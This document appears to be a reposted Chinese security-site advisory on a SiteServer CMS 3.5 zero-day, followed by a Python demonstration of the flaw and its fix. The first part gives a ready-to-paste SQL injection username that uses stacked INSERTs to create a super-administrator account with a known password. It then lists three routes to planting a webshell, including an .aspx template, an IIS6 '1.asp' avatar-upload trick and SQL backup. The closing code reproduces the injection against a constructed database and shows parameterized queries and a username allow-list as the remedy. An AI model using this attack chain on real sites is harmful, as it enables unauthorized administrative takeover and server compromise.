SiteServer CMS 0day vulnerability warning - 黑吧安全网 (myhack58)

ID MYHACK58:62201336625
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-01-08T00:00:00


After testing: this instantly takes down the latest version, 3.5.

SiteServer official website: www.siteserver.cn


Directly open UserCenter/login.aspx

In the username field, enter:

1 2 3'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

Leave the password blank, enter the verification code and submit. The stacked statements are inserted into the database, creating a super user with username blue and password lanhai.

Then open the back end at SiteServer/login.aspx and log in with the inserted user.

Three ways to get a webshell from the back end:


1. Site management - Display functions - Template management - Add single page template - generate an .aspx file directly.


2. Member permissions - Add user - set the username to: 1.asp

Log in with the newly added 1.asp user, then upload a personal avatar; because of the IIS6 parsing vulnerability this yields a webshell.

(PS: the back end does not check whether an added username contains illegal characters.)


3. System Tools - Utilities - Machine parameters view: shows the database type, database name and web path.

System Tools - Database Tools - SQL statement query: this function is well made; it is effectively a query analyzer with echoed output. You can back up to a webshell, or, if SQL Server is misconfigured, use that to get straight in.
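The two defects this write-up relies on are a login query built by string concatenation (so a quote and stacked statements in the username become SQL) and an add-user form that accepts anything as a username (so a name like 1.asp can later act as a script file name). The following is an added example, not code from the page or from SiteServer, showing the concatenated query beside its parameterized form and an allow-list username check. SQLite stands in for the SQL Server backend, the table names are a made-up schema, and the injected string is constructed for the demo in the same shape as the page's payload (quote, stacked INSERTs, trailing comment).

```python
import re
import sqlite3

# Constructed stand-in for the CMS administrator tables (hypothetical schema;
# SQLite replaces the SQL Server backend the advisory mentions).
SCHEMA = """
CREATE TABLE administrators (username TEXT PRIMARY KEY, password TEXT);
CREATE TABLE administrators_in_roles (rolename TEXT, username TEXT);
INSERT INTO administrators VALUES ('editor', 'hash-of-editor-pw');
INSERT INTO administrators_in_roles VALUES ('Administrator', 'editor');
"""

# Constructed login input in the shape of the page's payload: a quote closes
# the string literal, stacked INSERTs add an administrator, '--' comments out
# the rest of the original query.
INJECTED_USERNAME = (
    "x'; INSERT INTO administrators VALUES ('blue', 'attacker-hash');"
    "INSERT INTO administrators_in_roles VALUES ('Administrator', 'blue');--"
)


def fresh_db():
    """New in-memory database seeded with one legitimate administrator."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username, password):
    """Concatenated query: the input becomes part of the SQL text.
    executescript is used because, like the affected code path, the backend
    accepts several ';'-separated statements in one request. The SELECT's own
    result is discarded; the damage is the side effect on the tables."""
    sql = (
        "SELECT username FROM administrators WHERE username = '"
        + username + "' AND password = '" + password + "';"
    )
    conn.executescript(sql)
    conn.commit()
    return None


def login_parameterized(conn, username, password):
    """Hardened form: '?' placeholders bind the input as data, so the quote
    and the stacked INSERTs are only characters inside one string literal."""
    row = conn.execute(
        "SELECT username FROM administrators "
        "WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def admin_usernames(conn):
    """Sorted list of accounts holding the Administrator role."""
    rows = conn.execute(
        "SELECT username FROM administrators_in_roles "
        "WHERE rolename = 'Administrator'"
    )
    return sorted(r[0] for r in rows)


# Allow-list for usernames that later appear in file system paths (avatar
# uploads): letters, digits, '_' and '-' only, so no dots, slashes or other
# characters that would let a username double as a script file name.
USERNAME_RE = re.compile(r"[A-Za-z0-9_-]{3,32}")


def is_valid_username(name):
    return USERNAME_RE.fullmatch(name) is not None


if __name__ == "__main__":
    db = fresh_db()
    login_vulnerable(db, INJECTED_USERNAME, "")
    print("concatenated query, admins now:", admin_usernames(db))
    db = fresh_db()
    login_parameterized(db, INJECTED_USERNAME, "")
    print("parameterized query, admins now:", admin_usernames(db))
    for name in ("blue", "1.asp", "../avatar"):
        print(name, "->", "accepted" if is_valid_username(name) else "rejected")
```

Parameterization, not input filtering, is what closes the login injection: the same string that creates an administrator through the concatenated query matches no row and changes nothing when bound as a parameter. The username allow-list is a separate control for the add-user form and should be applied server-side on every path that creates an account, not just the front-end registration form.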